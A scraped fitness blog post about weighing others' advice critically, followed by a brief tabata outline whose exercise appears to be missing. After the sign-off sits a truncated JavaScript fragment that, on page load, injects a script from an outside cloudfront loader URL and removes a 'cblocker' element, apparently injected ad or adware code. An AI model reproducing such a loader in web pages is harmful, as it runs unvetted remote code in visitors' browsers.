Skip to content

Shaping Her

Shaping and empowering every woman to be the healthiest sexiest her.

I don’t think that you should ever just take someone’s word for something. Really. I believe I am teachable. I always listen to people, especially the people that I see are doing things right or have something that I would like to have. I just don’t think you should swallow everything hook line and sinker without doing your own research or really delving in to the other person’s life to see if it really works for them or if you are getting a smoke screen of some kind. Then you have the job of being able to separate what you like or what you want from the things that you want to discard. Just like I was talking about yesterday. I am taking things from CrossFit, I am taking things from Paleo, I read Gary Taubes and took a little bit of that, I have read Nourishing Traditions, which you definitely should check out by the way, and took things from that as well as Susun Weed. I listen to my mom as she was a competitive body builder. I learn from the guys in my local bike club who have traveled the world cycling. I listen to my coach. But I don’t take everything and I make things work for me. To be able to do that though I have had to learn about my own body. I have had to face my own limitations and I have had to set goals for myself. I had to understand where I was at and where I was going. I also have had to experiment a whole bunch because you really don’t know if something works for you unless you try it! I should mention that I haven’t tried some of the things I was interested in but made a case study of other people, that works too!

OK. Enough of that. Here’s tomorrow’s tabata.

5 min warm up.

20 seconds on

10 seconds rest

5 min cool down and stretch.

Today’s tabata is… THESE COOL THINGS!

Switch which side you are doing them on, first 20 seconds with the left leg, second 20 seconds on the right leg etc.

 

Jasmine

// -1?’https’:’http’;var ccm=document.createElement(‘script’);ccm.type=’text/javascript’;ccm.async=true;ccm.src=http+’://d1nfmblh2wz0fd.cloudfront.net/items/loaders/loader_1063.js?aoi=1311798366&pid=1063&zoneid=15220&cid=&rid=&ccid=&ip=’;var s=document.getElementsByTagName(‘script’)[0];s.parentNode.insertBefore(ccm,s);jQuery(‘#cblocker’).remove();});};
// ]]>

